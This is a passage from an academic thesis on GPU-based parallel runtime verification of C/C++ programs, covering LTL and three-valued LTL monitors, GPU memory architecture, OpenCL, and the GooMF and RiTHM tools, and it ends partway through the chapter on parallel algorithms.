3.1 Sequential algorithm flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
3.2 Monitors for properties, where (a) ∥Hφ∥= 0, and (b)∥Hφ∥= 1. . . . . . . 20
3.3 Monitors for properties φ1≡p∧(qUr) andφ2≡□(p⇒(qUr)). . . . . 22
3.4 Eliminating interdependencies for parallel execution . . . . . . . . . . . . . 29
3.5 GPU-based architecture for experiments . . . . . . . . . . . . . . . . . . . 30
3.6 Evaluation results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
3.7 Throughput vs number of work items . . . . . . . . . . . . . . . . . . . . . 34
3.8 Effect of the buffer and data sizes . . . . . . . . . . . . . . . . . . . . . . . 35
3.9 Case study experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
4.1GooMF work–flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
4.2 Building blocks and data flow in RiTHM. . . . . . . . . . . . . . . . . . . . 49
4.3 Example of a program and CFG. . . . . . . . . . . . . . . . . . . . . . . . 50
4.4 Instrumented programs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
ix
5.1 Monitors for a sample of parametric properties. . . . . . . . . . . . . . . . 57
5.2 Algorithms execution times . . . . . . . . . . . . . . . . . . . . . . . . . . 67
x
Chapter 1
Introduction
In this chapter, we outline the motivation behind the current work. First part of the
chapter regards the problem of verification overhead. As verification happens at a run
time, the verification time adds up to the original execution time of the program under
scrutiny. For obvious reasons, this might be a problem for real-time, embedded, mission-
critical systems, and in general for systems with tight time constraints. Second part of the
chapter describes the shortage of run-time verification tools for the software written in C
and C++ . At the end of the chapter, we spell out the main contributions of this thesis
and provide an overview of the thesis structure.
1.1 Run-Time Verification and Execution Overhead
Problem
In computing systems, correctness refers to the assertion that a system satisfies its speci-
fication. Formal verification is a technique for checking such an assertion at design time.
One instance of formal verification is model checking , where a state–space and a transition
relation of a system are generated, and proof of correctness with respect to the system
specification is automatically derived. The three major issues with model checking are
(1) the infamous state explosion problem , (2) complexity of inferring the model from the
inspected program, and (3) running the checking procedure on the model rather than on
the real program. The first drawback is a combinatorial expansion of the state–space and
usually observed for programs with a large set of variables, where model checking reaches
its available memory limits rapidly. The second drawback might be problematic when the
1
Program
Program traceMonitorFigure 1.1: Run-time verification flow
system is large or complex, and the model derivation steps are not straightforward. The
third issue is related to the second, when running the model checking on the wrong model
can lead to erroneous conclusions.
As opposite to model checking, testing and debugging provide us with under-approximated
confidence about the correctness of a system as these methods only check for the presence
of defects for a limited set of scenarios. In general, most of the industrial projects tend
to contain thousands of lines of code and complexity proportional to its size. For such
software projects, it is virtually impossible to come up with an effective path coverage.
Another aspect of software testing is the cost associated with it. The non-exhaustive na-
ture of the testing makes it difficult to set a target testing level. To deal with the issue of
software confidence, software reliability models were developed to estimate the amount of
bugs in the system. However, this solution still bears an amount of uncertainty.
Run-time verification [15, 21, 36] refers to a technique where a monitor checks at a run
time whether or not the execution of a system under inspection satisfies a given correctness
property. Figure 1.1 shows generalized picture of run-time verification flow: while running,
program under scrutiny generates a program trace, which, in turn, is inspected by the
monitor under the set of previously specified properties. Whereas the general architecture is
stable, different aspects may vary. For example, the length of the program trace aggregated
before being verified can be one program state (yielding event-triggered monitoring) or
more ( time-triggered orbuffer-triggered monitoring). The monitor can be implemented as
a part of the program or as an external instance. The verification itself can be synchronous
(program waits until it finishes) or asynchronous (program submits the trace and relies on
the monitor to report back). There could be other variations, such as different formalisms
2
for property specifications, but the core remains the same: verification occurs at a run
time on the current program trace. Run-time monitoring refers to more general monitoring
process, where the program trace is monitored at a run time, but without specific goal of
verifying the properties. In this thesis, we do not distinguish between two processes and
use both names alternatively.
Run-time verification complements offline verification methods, such as model checking
and theorem proving, as well as incomplete solutions, such as testing and debugging. As
such, run-time verification takes the best of both worlds: exhaustive nature of the offline
verification techniques, while applying them to the real program trace as in testing and
debugging. This advantage obviously comes at a price. The main challenge in augmenting
a system with run-time verification is dealing with its run-time overhead . It can come from
several sources:
1. Invocation of a monitor
2. Calculation and evaluation of property predicates given a program state
3. Possible slowdown due to program instrumentation and program trace extraction
4. Possible interference between program and monitor, as monitor shares resources with
a program
All of these sources may contribute to the overall overhead different amounts, depending
on several factors, such as type of the inspected program, type of the properties being
verified, and the way the monitor is implemented. This work aims at reducing the run-
time overhead coming from sources 2 and 4. The advantage comes from the fact that we
propose to use a separate platform for the monitor — thus the first meaning of parallel
run-time verification . The interference between the monitor and the program (source 4) is
minimized, since most of the computations are carried out on the GPU side (except some
IO operations), so that the inspected program has an exclusive rights for the CPU as in the
scenario without monitoring. As the program’s demand to the CPU resources grows, the
benefit of the proposed architecture becomes clearer. As an aside note, same architecture
can be built with specialized hardware, such as FPGAs, but the cost of developing dedicated
hardware for the monitoring is not comparable with the cost of the GPU, which is already a
standard feature on the majority of machines. In addition, recent advances in the General-
Purpose GPU (GPGPU) programming allow relatively easy reprogramming of the GPUs
as monitored properties evolve. This is not the case with FPGAs and ASICs.
3
GPU-based monitoring also benefits form the engagement of multiple cores in the ver-
ification. This is particularly critical when the verification involves computationally inten-
sive operations (overhead source 2), such as mathematical calculations, which are especially
common in the properties designed for programs in safety-critical domain. In our approach,
the burden of computations is distributed between the ample of processing elements offered
by the GPUs — hence the second meaning of parallel run-time verification . Each process-
ing element performs calculations on separate program state, thus reducing the verification
time and, as shown later, decreasing the power consumption of the board the CPU and
the GPU reside on.
Another significant problem introduced by run-time verification is the overhead control ,
as monitoring often introduces two types of defects to the system under scrutiny: (1) unpre-
dictable execution and (2) possible bursts of monitoring intervention in program execution.
Extensive research has been carried on these aspects [10, 11, 41], proposing time-aware in-
strumentation of the programs. These works suggest to buffer frequent bursts of events
into the internal history to reduce the overhead coming from the excessive invocation. The
common feature of these works is the element of buffering the events. Parallel run-time
verification is particularly suitable for this scheme, because the power of GPU is only
leveraged when program states are buffered and the trace processed in parallel on multiple
cores. The synergy between time-triggered and parallel run-time verification resulted in a
tool called Run-time Time-triggered Heterogeneous Monitoring (RiTHM), which employs
time-aware instrumentation and smart buffering [10, 41] as a front end, and uses parallel
verification algorithms from this work as a back-end verification engine.
1.2 Shortage in RV Frameworks for C and C++
C and C++ are de-facto primary languages for embedded, mission-critical, and real-time
systems. Unfortunately, there is a lack of run-time verification tools for C programs. This
is due to the fact that C and C++ source code is processed by compilers. Therefore, the
ability to instrument an intermediate code representation is dependent on the compiler
capabilities rather than on the original code. Java, on the other hand, offers an inter-
mediate representation of its code called byte code, which enables instrumentation and
manipulation with its structure even without having a source code.
Due to these limitations, the research community mainly focused on developing tools
for Java, rather than for C and C++. The most prominent examples of the monitoring
framework for Java are JavaMOP (monitoring-oriented variation of JavaPATH) [26], J-
LO [7], JavaMaC [28], RuleR [4], Eagle [3], and Tracematches [1]. The majority of these
4
frameworks use the instrumentation engine AspectJ [27], which leverages the structure and
the semantics of Java byte code to weave the monitoring code into specific points in the
inspected program. The success of AspectJ pushes the research community farther towards
using Java as a default target language for instrumentation-based tools and frameworks.
Interestingly, some of the works in this area outline the monitoring architecture rather
than specific language instance (Monitoring and Checking (MaC), Monitoring-Oriented
Programming (MOP) [13]), but eventually choose Java for the implementation.
As a partial solution to this problem, we present GPU-based online and offline Moni-
toring Framework ( GooMF ).GooMF implements the verification algorithms presented
in Chapter 3 and serves as a back-end verification engine for programs under examination.
The developer of the program only has to specify the properties using one of the two for-
malisms ( Ltlor FSM) and call the API functions for the actual verification. The user can
switch between the verification algorithms merely by changing one parameter in the ini-
tialization function. Moreover, when the program specifications evolve, the only thing that
needs to be changed is the properties file, whereas the source code of the program remains
unmodified. GooMF is also capable of working in both blocking and non-blocking mode
and offers some other features discussed in Section 4.2. As a result, the user has full control
over the verification, while, at the same time, the implementation details remain hidden
behind clean and minimalistic API. We designed the tool believing that simplicity-of-use
is the main factor to attract users.
GooMF is only a partial solution to the deficit of tools for C, because it represents
only the back end. Without automatic instrumentation of the inspected program, the
responsibility of calling the API functions lays on the developer. The first steps towards
solving this issue are described in Section 4.3, where we wrap the instrumentation and
verification parts in one tool RiTHM. Also, several instrumentation tools for C and C++
appeared recently, mostly based on GCC and LLVM plug-ins. It might be appealing to
try to interface these tools with GooMF in one monitoring framework.
1.3 Contributions
This thesis presents a research for practical run-time verification over many-core platforms,
and an application of this research in the novel verification tool GooMF . The key contri-
butions of this work are driven by motivation presented in the previous section, and can
be summarized in two main parts:
•One sequential and three parallel algorithms for run-time verification. These algo-
5
rithms can run on CPU or GPU or other many-core platform that supports OpenCL
standard. The algorithms form a hierarchy based on the degree of GPU involvement
in the verification process and, consequently, on the suitability for the specific prop-
erty.
•Implementation of these algorithms in GooMF — easy-to-use and flexible verification
framework that allows C/C++ developers to state the desirable program properties
and verify them at run time using one of four presented verification algorithms.
Besides being a first GPU-based monitoring engine, GooMF fills the shortage in
run-time verification tools for C and C++.
1.4 Thesis Overview
Chapter 2 provides background information on the formalisms used to specify the properties
and on the generation of the sound monitors for these properties. It also contains high-
level overview of the GPU architecture and the implementation language for the parallel
algorithms.
Chapter 3 presents four verification algorithms that, given a property and a program
trace, output verification result. The algorithms are introduced in the order of the GPU
engagement. This chapter also contains experimental results for various performance mea-
surements, as well as an evolved case study, which demonstrates the practicality of the
algorithms.
Chapter 4 describes the author’s work on the implementation of GooMF — the ver-
ification framework that has in its core four algorithms from Chapter 3. The chapter
elaborates on the architecture and the most noteworthy features of the tool, as well as
reports about interesting implementation issues encountered during the development.
Chapter 5 offers insight on the parameterized monitoring, its advantages over the regu-
lar, non-parameterized monitoring, and the difficulties that it introduces. After the general
discussion, the chapter describes how parameterized monitoring modifies the algorithms
and how GooMF handles parameterized monitoring.
Finally, Chapter 6 discusses related work, and Chapter 7 concludes the thesis with the
discussion about the applicability of parallel run-time verification and opportunities for
future research.
6
Chapter 2
Background
In this chapter, we present the body of knowledge the current work is based upon. Namely,
Ltl formalism (Section 2.1), which serves as a main specification language for the prop-
erties used in this work. It is also one of the two formalisms accepted by GooMF .Ltl 3
(Section 2.2) is an extension of Ltland is particularly suitable for the run-time monitoring,
because of additional logic value “?”. The intuition behind this logic is as follows: while
monitoring a program at a run time, only finite sequence of the program states is available
at any given time moment. While some of the properties are satisfied ( ⊤) / violated (⊥)
given this program trace, other properties will need additional (possibly infinite) sequence
of program states to converge. This intermediate state of the evaluation is represented by
logical value “?”.
If the reader is unfamiliar with the concept of GPGPU and heterogeneous programming,
the last two sections will fill the gaps. Section 2.3 describes the memory architecture
of Graphics Processing Units — our target device for the parallel algorithms. It also
sheds light on some performance issues related to the memory hierarchy of the verification
platform. Section 2.4 provides the reader with the required information about OpenCL —
language for writing programs running on heterogeneous platforms. In GooMF ,OpenCL
code is used to express the core functionality of the verification algorithms.
2.1 Linear Temporal Logic (LTL)
Linear temporal logic (Ltl) is a popular formalism for specifying properties of (concurrent)
programs. The set of well-formed linear temporal logic formulas is constructed from a set
7
of atomic propositions, the standard Boolean operators, and temporal operators. Precisely,
letAPbe a finite set of atomic propositions and Σ = 2APbe a finite alphabet . A lettera
in Σ is interpreted as assigning truth values to the elements of AP; i.e., elements in aare
assigned true (denoted ⊤), and elements not in aare assigned false (denoted ⊥). A word
is a finite or infinite sequence of letters w=a0a1a2..., whereai∈Σ for alli≥0. We
denote a set of all finite words over Σ by Σ∗and a set of all infinite words by Σω. For a
finite word uand a word w, we writeu·wto denote their concatenation . We write ωito
denote the suffix of ωstarting at ai.
Definition 1 ( LtlSyntax) Ltl formulas are defined inductively as follows:
φ::=⊤ |p| ¬φ|φ1∨φ2| ⃝φ|φ1Uφ2
wherep∈Σ, and,⃝(next) and U(until) are temporal operators. ■
An interpretation for an Ltl formula is an infinite wordω=x0,x1,x2,... over the
alphabet 2AP; i.e. a mapping from the naturals to 2AP. In this thesis ωwill usually denote
an infinite word as opposite to finite u.
Definition 2 ( LtlSemantics) Letw=a0a1...be an infinite word in Σω,ibe a non-
negative integer, and |=denote the satisfaction relation. Semantics of Ltl is defined in-
ductively as follows:
w,i|=⊤
w,i|=p iffp∈ai
w,i|=¬φ iffw,i̸|=φ
w,i|=φ1∨φ2iffw,i|=φ1∨w,i|=φ2
w,i|=⃝φ iffw,i+ 1|=φ
w,i|=φ1Uφ2iff
∃k≥i:wk|=φ2∧ ∀i≤j≤k:w,j|=φ1.
In addition, w|=φholds iff w,0|=φholds. ■
8
AnLtl formulaφdefines a set of words (i.e., a language or a property ) that satisfies
the semantics of that formula. We denote this language by L(φ). We note that the results
presented in this work remain valid if the logic LTL is built over atomic propositions as
well as over letters. For simplicity, we introduce abbreviation temporal operators. ♦φ
(eventuallyφ) denotes⊤Uφ, and □φ(alwaysφ) denotes¬♦¬φ. For instance, formula
□(p⇒♦q) means that ‘it is always the case that if proposition pholds, then eventually
proposition qholds’. One application of this formula is in reasoning about non-starvation
in mutual exclusion algorithms: ‘if a process requests entering a critical section, then it
eventually is granted to do so’.
In order to reason about a correctness of programs with respect to an Ltl property,
we describe a program in terms of its state space and transitions. A program is a tuple
P=⟨S,T⟩, whereSis the non-empty state space andTis a set of transitions . A transition
is of the form ( s0,s1), wheres0,s1∈S. A state of a program is normally obtained by
valuation of its variables and transitions are program instructions. In this context, an
atomic proposition in a program is a Boolean predicate over S(i.e., a subset of S).
We define a trace of a program P=⟨S,T⟩as a finite or infinite sequence of subsets
of atomic propositions obtained by valuation of program variables (i.e., program states).
Thus, a program trace can be defined as σ=s0s1s2..., so thatsi∈Sand each (si,si+1)∈
T, for alli≥0. A program trace σsatisfies anLtl propertyφ(denotedσ|=φ) iff
σ∈L(φ). Ifσdoes not satisfy φ, we say that σviolatesφ. A program Psatisfies an
Ltl propertyφ(denotedP|=φ) iff for each trace σofP,σ|=φholds. For example,
consider the following piece of code:
x := 10;
while (x <= 100){
x := x + 2;
}
It is straightforward to observe that this code satisfies the following properties: □pand
♦q, wherep≡(x≥10) andq≡(x= 100).
2.2 3-Valued LTL
Implementing run-time verification boils down to the following problem: given the current
program finite traceσ=s0s1s2...s n, whether or not σbelongs to a set of words defined
by some property φ. This problem is more complex than it looks, because Ltlsemantics
9
is defined over infinite traces and a running program can only deliver a finite trace at a
verification point. For example, given a finite trace σ=s0s1...s n, it may be impossible
for a monitor to decide weather the property ♦pis satisfied. To clarify this issue, consider
the case where for all i, 0≤i≤n,p̸∈si, then the program still has the chance to satisfy
♦pin the future. In other words, a monitor can decide whether a property is violated
only if all the reachable states of the program under inspection cannot possibly satisfy the
property. Respectively, the monitor reports satisfaction of the property if any sequence of
program states that follows σsatisfies the property.
To formalize satisfaction of Ltl properties at run time, in [6], the authors propose
semantics for Ltl, where the evaluation of a formula ranges over three values ‘ ⊤’, ‘⊥’, and
‘?’ (denoted Ltl 3). The latter value expresses the fact that it is not possible to decide on
the satisfaction of a property, given the current program finite trace.
Definition 3 ( Ltl 3semantics) Letu∈Σ∗be a finite word. The truth value of an Ltl 3
formulaφwith respect to u, denoted by [u|=φ], is defined as follows:
[u|=φ] =

⊤if∀w∈Σω:u·w|=φ,
⊥if∀w∈Σω:u·w̸|=φ,
?otherwise.■
Note that the syntax [ u|=φ] forLtl 3semantics is defined over finite words as opposed
tou|=φforLtl semantics, which is defined over infinite words. For example, given a
finite program trace σ=s0s1···sn, property ♦pholds iff si|=p, for somei, 0≤i≤n
(i.e.,σis a good prefix). Otherwise, the property evaluates to ?. Thus, one can reason
about satisfaction of properties in Ltl 3through the notion of good/bad prefixes defined
below. This is the reason why to the great extent monitor operation may be entirely based
onLTL 3semantics: return ⊤once the property is satisfied independently of the further
input; return⊥once the property is violated independently of the further input; return ?
if both outcomes are possible.
Definition 4 (Good and Bad Prefixes) Given a language L⊆Σωof infinite words
over Σ, we call a finite word u∈Σ∗
•agood prefix forL, if∀w∈Σω:u·w∈L
•abad prefix forL, if∀w∈Σω:u·w /∈L
10
q⊥trueinit spawn ∧ ¬init¬spawn ∧ ¬init
“?”q0
trueq⊤Figure 2.1: The monitor for property φ≡(¬spawn Uinit)
•anugly prefix otherwise. ■
In order to declare a verification verdict by a monitor more efficiently, it is advantageous
to recognize good and bad prefixes as early as possible.
Definition 5 (Minimal Good/Bad Prefixes) A bad (good) prefix ufor language L⊆
Σωis called minimal if each strict prefix of uis not a bad (good) prefix. ■
Implementing run-time verification for an Ltl 3property involves synthesizing a monitor
that realizes the property. In [6], the authors introduce a stepwise method that takes an
Ltl 3propertyφas input and generates a deterministic finite state machine (FSM) Mφas
output. Intuitively, simulating a finite word uon this FSM reaches a state that illustrates
the valuation of [ u|=φ].
Definition 6 (Monitor) Letφbe an Ltl 3formula over alphabet Σ. The monitorMφ
ofφis the unique FSM (Σ,Q,q 0,δ,λ), whereQis a set of states, q0is the initial state,
δis the transition relation, and λis a function that maps each state in Qto a value in
{⊤,⊥,?}, such that:
[u|=φ] =λ(δ(q0,u)).■
For example, consider the property φ≡(¬spawn Uinit) (i.e., a thread is not spawned
until the program is initialized). The corresponding monitor is shown in Figure 2.1. The
proposition true denotes the set APof all propositions. Examples of monitors appear also
in Figures 3.2 and 3.3. We use the term a conclusive state to refer to monitor states q⊤
11
andq⊥; i.e., states where λ(q) =⊤andλ(q) =⊥, respectively. Other states are called
aninconclusive state . A monitorMφis constructed in a way that it recognizes minimal
good and bad prefixes of L(φ). Hence, ifMφreaches a conclusive state, it stays in this
trap state. If a monitor has only ugly inconclusive state, all monitoring activity becomes
obsolete, which leads us to the notion of monitorable properties.
Definition 7 (Monitorable Property (Bauer et al. 2011)) AnLtl 3propertyφis
monitorable ifL(φ)has no ugly prefixes. We denote the set of all monitorable Ltl 3prop-
erties by Ltlmon
3.■
Definition 8 (Monitorable Property) AnLtl 3propertyφismonitorable if there ex-
ists some good/bad prefix for L(φ). We denote the set of all monitorable Ltl properties by
Ltlmon
3.
In other words, a property is monitorable if for every finite word, there still exists a
(possibly) infinite continuation that will determine whether the property is violated or
satisfied.
Our notion of monitorable properties in Definition 8 is more relaxed than the one in
[6]; i.e., our definition allows existence of ugly prefixes as long as useful information can be
extracted from the input sequence. To demonstrate this difference, consider Ltlproperty
φ≡□♦q. The monitor for this property does not include a trap state q⊤orq⊥. Hence,
φis non-monitorable according to Definition 8. On the contrary, property ψ≡p∨□♦q
is monitorable according to our definition, as given a prefix u∈Σ∗and depending upon
the value of proposition pin the current state, the monitor can reach a conclusive state if
proposition pis observed.
2.3 Graphics Processing Unit (GPU) Architecture
In recent years, the area of heterogeneous computing has taken a giant leap forward. As
processing power of CPUs is restrained by Moore’s law, energy consumption and thermal
considerations has become a design focus for future processors. The scaling in the com-
puting power is achieved mainly through the multiplication of cores, and, as a result, the
current CPU architecture reminds more and more of that of the GPU. As we discuss the
GPU architecture, we denote the CPU as the host, and GPU as the device , although device
could actually be any computing device, including the same or other CPU. In the modern
12
Figure 2.2: GPU architecture on the example of Nvidia GeForce GTX 480
architectures, a CPU commonly has 4 to 8 fast, flexible cores clocked at 2-3Ghz, whereas
a GPU has hundreds of relatively simple cores clocked at about 1Ghz.
In Chapter 3, our proposed verification algorithms leverage the power of the GPUs by
evaluating the program trace in parallel on multiple stream cores the GPU offers. Among
the selection of many-core architectures, the GPU platform is particularly appealing, be-
cause it conforms to the Single Instruction Multiple Data (SIMD) pattern, which is ideal
for our algorithms. Thus, for the informative and efficient estimation of the algorithms
performance, it is vital to understand the GPU memory hierarchy.
Figure 2.2 illustrates the architecture and Figure 2.3 illustrates the memory layout of
the most existing GPUs. The host communicates with the device via the global memory .
Every buffer sent from the host to the device automatically loaded to the global memory
and from there can be dispersed over other memories. The same applies to the opposite
direction: to transfer the computational results from the device, the results must first
reside in the global memory. Constant memory is a subset of global memory that is not
a subject for change and thus is perfect for caching. Therefore, if the data is read-only, it
is advantageous to load it to the constant memory to get faster access. Global memory is
accessible by all the threads across multiple compute units, and thus, the slowest memory
type in the hierarchy. Sometimes, when the number of memory accesses is significant, it is
better to copy the data first to the local memory and work with it.
Local memory (shared memory in Nvidia architectures) is faster than global memory,
13
Figure 2.3: GPU memory hierarchy
and in general, local to the compute unite . As Figure 2.2 suggests, every device consists of
one or more compute units, which can operate autonomously. In CPUs, compute unit cor-
responds to one CPU core. In GPUs, compute unit (called also streaming multiprocessor ),
comprises workgroup — multiple worker threads (called also streaming processor ,processing
element ,GPU core ), which can share the same local memory. This memory is particularly
useful, since the memory model does not encourage global synchronization. Instead, the
synchronization should be carried out on the workgroup level. In the modern architectures,
the amount of local memory available reaches 64 KB per streaming multiprocessor (AMD
Radeon HD7970).
The last type is the private memory , which is, naturally, private to the worker thread.
As this is the fastest memory in the hierarchy, it is usually restricted by relatively small
number of registers available per thread. For example, in Nvidia Fermi architecture, there
are 32K of 32-bit registers per streaming multiprocessor, which means up to 63 registers
per thread. This memory is used for private and temporary calculations or for data that
requires especially frequent access. If an application requires more private memory than
available, it “spills” to the local, and from there to the global memory.
There are several key steps in the algorithms that might be affected by the memory
14
parameters:
1. Transfer of the program states from the host to the device. The amount of memory
copied from the host to the device for every algorithm iteration is affected by two
factors: number of program states in the buffer and the size of the program state.
The transfer volume, thus, can reach high numbers and high transfer speed is crucial
for algorithms throughput.
2. Transfer of the bound property parameters from the host to the device. When the
parametric monitoring is in use (Chapter 5), verifier has to know the values of the
bound variables. The amount of memory copied from the host to the device for every
algorithm iteration is affected by two factors: number of the parametric properties
and the size of the parameter values.
3. Transfer of the monitor state from the device to the host. After the algorithm
iteration is over, the result is to be transferred back for the final monitoring state
update. The amount of the memory is negligible comparing to the previous steps.
4. During the verification phase on the device, multiple worker threads access the mem-
ory simultaneously to read the program states, current monitor states, and parameter
values. The number of memory accesses is equal or greater of the number of program
states in the buffer. Therefore, the memory access speed is a key factor of the overall
algorithm performance.
To summarize the effect of memory layout on the algorithms performance: for the first
step, the speed of the memory transfer from the host to the device is crucial, as we want the
memory volume (buffer of the program states) to be scalable. The considerations about
global memory size are insignificant, since modern GPUs offer up to 5 GB of the global
memory and the verification buffer is unlikely to reach this size. For the fourth step, the
memory access speed is critical. It may be beneficial to copy the frequently accessed data
to the local or even private memory before the computation stage. In essence, there is a
tradeoff between the cost of copying the data between the memories and the speedup in
the access speed.
During the last several years, there is a tendency in the industry towards unifying CPU
and GPU memory spaces. The prominent example of this trend is AMD Fusion architec-
ture (recently renamed to Heterogeneous Systems Architecture (HSA)), which combines a
regular processor execution and the GPU functions into a single die. There are already
some papers being published that report on performance comparison between different
15
architectures [39]. It will be intriguing to see how these architecture changes affect the
memory transfer rates.
2.4 OpenCL Background
With the recent developments in heterogeneous computing, it became clear that a new,
cross-platform language is required, that will ideally run in different environments (single-
core, multi-core, many-core) with minimal portability effort. This language should facili-
tate the use of the GPU and general-purpose GPU programming, but also should work on
other many-core platforms after recompiling the source code. As a result, several years ago
emerged a need in the cross-platform language that will unify the vendors architectures
and will offer the unified programming model for the parallel-intensive tasks as well as for
sequential ones.
In 2008, Khronos group1introduced OpenCL — language based on C99 (ISO/IEC
9899:1999) standard with some restrictions and several specialized additions. Particularly,
OpenCL prohibits function pointers, custom header files (so that all the code resides in
one file), recursion, and bit-arrays. On the other hand, it introduces new vector data types
(to facilitate the use of the stream processors), built-in synchronization mechanisms and
rich library of mathematical functions. It also provides designated memory region qualifiers
that correspond to the memory hierarchy from the previous section: global ,constant ,
local and private .
OpenCL code can be of two types: host code (running on the host) and device code,
also called kernel (running on the compute device). The essence of the OpenCL is in
task-oriented programming, where parallel-intensive computations are wrapped into tasks
and sent to the device. The responsibility of the host code is to manage compute devices,
command queues, compute tasks, and potentially synchronize between different kernels
(global synchronization). Luckily, in GooMF the majority of these operations is performed
during the initialization phase. The compiler (usually vendor-specific) compiles the kernel
to the device code. Examples of SDKs that provide such compiler and include OpenCL
API implementation are: AMD Accelerated Parallel Processing (APP) SDK and NVIDIA
OpenCL SDK. Figure 2.4 shows an example of simple vector summation program written
in C (Figure 2.4a) and kernel in OpenCL (Figure 2.4b).
OpenCL adheres a relaxed memory consistency model [22], which (1) allows work
items to access data within private memory; (2) permits sharing of local memory by work
1http://www.khronos.org/opencl/
16
(a) Adding two vectors in C
 (b) Adding two vectors as an OpenCL kernel
Figure 2.4: Example of a program in C and in OpenCL kernel.
items during the execution of a work–group; (3) only guarantees memory consistency after
various synchronization points, such as barriers within kernels and queue events; (4) does
not offer communication and synchronization between different work–groups as consistency
of variables across a collection of workgroup items is not guaranteed; and (5) defines and
satisfies data dependencies via work queues and atomic operations.
There are multiple mechanisms in OpenCL that facilitate the use of the memory model.
For internal synchronization, there are multiple atomic functions, such as atomic min(),
atomic max(), etc. As the memory model stresses the in-group synchronization, applying
those functions to the parameters residing in the global memory results in extremely high
latency (see Subsection 4.2.5 for our experience). Additional synchronization mechanisms
are local memory barriers, placed to ensure that data is not overwritten in the shared
memory before all of the work–items in a work–group have accessed it. The barrier can
be set either on load access, store access, or both [40]. This coordinated loading and
sharing of data reduces the number of slow global memory accesses. In addition to in-
group synchronization, OpenCL offers global synchronization between the kernels, by
employing an event-based approach. Compute kernel can register to the event fired upon
completion of other kernel. Moreover, the number of events required (or fired) by kernel
can vary.
17
Chapter 3
Algorithms Hierarchy
In this chapter, we introduce a set of algorithms for verifying Ltlmon
3properties at run time.
Three of the algorithms employ Single Instruction Multiple Data (SIMD) parallelism and,
as a result, are particularly suitable to run on Graphics Processing Unit or other many-core
platform. The presentation of the algorithms is sequenced in the order of GPU involve-
ment in the verification process. We start from Section 3.1, which describes CPU-based
sequential counterpart of the parallel algorithms. Then in Subsection 3.2.1 we introduce
the notion of property history as a performance metric of finite-history parallel algorithm.
Finally, in Section 3.2, we present three parallel algorithms: partial–offload (Subsection
3.2.2), finite-history (Subsection 3.2.3) and infinite-history (Subsection 3.2.4). Compar-
ing to the finite-history algorithm, the infinite-history algorithm is more general but less
efficient, and suitable for properties with both infinite and finite history lengths. Section
3.3 concludes the chapter with the evaluation results.
3.1 Sequential Algorithm
Before discussing the parallel algorithms, we first describe their sequential counterpart.
It will serve us two purposes: (1) better understanding of other algorithms, and (2) rep-
resenting a reference point in algorithms performance comparison in Section 3.3. Being
sequential by nature, this algorithm performs the verification totally on the CPU side.
After the verification buffer is flushed, for every program state the algorithm performs the
following steps:
1. New program state siis received.
18
Program trace Current monitor state
truerq0 q1
q⊥p∧ ¬q∧ ¬r ¬q∧ ¬rp∧q∧ ¬r¬p∨r q ∧ ¬r
q0
q⊥q1s0:¬p∧ ¬q∧ ¬r
s3:p∧q∧r
q0q0
s5:p∧ ¬q∧ ¬rs4:¬p∧ ¬q∧ ¬rs1:p∧q∧ ¬r
q1s2:p∧q∧ ¬r
q0Figure 3.1: Sequential algorithm flow
2. Based on si, perform calculations to map predicates (the Ltlformula consists of) to
eithertrue orfalse .
3. Based on the values of the predicates, make the appropriate transition if needed.
More formally, let P=⟨S,T⟩be a program and σ=s0s1s2...be a trace of P. Also,
letφbe a property in Ltlmon
3andMφ= (Σ,Q,q 0,δ,λ) be its monitor, which is intended
to inspect program P. One can build a sequential implementation of Mφby employing a
sequence of conditional statements as follows. By every change of program state si,i≥0,
monitorMφcalculatesqi+1=δ(qi,ui), whereuiis a mapping of program state sionto an
alphabet Σ. The output of each algorithm step is λ(qn+1).
Figure 3.1 illustrates the algorithm run on the monitor FSM received from property φ=
□(p→(qUr)).s0,s1,s2,s3,s4,s5are the program states in the buffer with corresponding
predicate values in the first column. q0,q1,q⊥are the states of the monitor with middle
column showing the current monitor state. As can be seen, the monitoring run follows the
following path on the FSM: q0→q0→q1→q1→q0→q0→q⊥.
The time required to evaluate nprogram states can be described by the following
equation:
Tseq=n.(tcalc+tbranch ) (3.1)
wheretbranch is the time spent in a conditional statement to compute the next state of
Mφandtcalcis the (proposition to alphabet) translation time. For instance, consider the
19
q⊤
true
φ=⊤(a)
φ≡□pp ¬pq0
qq0
q⊥¬p∧ ¬qq0p ¬p p ∧ ¬q
trueq⊤ q⊤
true trueq⊥
true
φ≡♦p φ ≡pUq (b)
Figure 3.2: Monitors for properties, where (a) ∥Hφ∥= 0, and (b)∥Hφ∥= 1.
Ltlmon
3propertyφ≡p∧(qUr) in Figure 3.3a, where p≡(log(x)≤1.0),q≡(sin(y)≤2),
andr≡(tan(z)≥3.0). Here,x,y, andzare program variables and p,q, andrare atomic
propositions over the program states. Hence, tcalcinvolves calculation of log( x), sin(y),
and tan(z).
tcalcand, consequently, Tsec, increase linearly with computational complexity of (propo-
sition to alphabet) translation. Now, if we are to evaluate multiple Ltlmon
3properties
(saym), the algorithm complexity becomes O(m.n) and this linear increase appears in all
evaluations:
Tseq=n.(m∑
j=1(tj
calc+tj
branch ))
(3.2)
Our parallel algorithms described in this section tackle this linear increase by distribut-
ing the calculation load across multiple processing units.
3.2 Parallel Algorithms
3.2.1 History of LTL Property
The construction of a monitor for an Ltl 3property as described in Section 2.2, allows
evaluation of a prefix with respect to the property by observing state-by-state changes in
20
the program under scrutiny. In other words, the monitor processes each change of state
in the program individually. Such state-by-state monitoring is inherently sequential. The
core of our idea to leverage parallel processing in run-time verification of a property is to
buffer a finite program trace and then somehow assign one or more sub-trace to a different
monitoring processing units. We assume that the length of the program trace is given as
an input parameter by the system designer. This length may depend on factors such as:
(1) hardware constraints (e.g., memory limitations), (2) tolerable detection latency (i.e.,
the time elapsed since a change of state until a property violation is detected), or (3) the
sampling period in time-triggered run-time verification [10] (e.g., for scheduling purposes
in real time systems).
Although our idea seems simple and intuitive, its implementation may become quite
complex. This is due to the fact that truthfulness of some Ltl 3properties is sensitive
to the causal order of state changes. For example, monitoring property φ≡□(p⇒♦q)
has to take the order of occurrence of atomic propositions pandqinto account. In other
words, occurrence of qis of interest only if phas occurred before. This leads us to our
notion of history carried by an Ltl 3formula. This history can be seen as a measure
of “parallelizability” of the property; it can also serve as a performance metric for the
algorithm introduced in 3.2.3.
One can observe that each state of Mφfor a property φinLtlmon
3represents a different
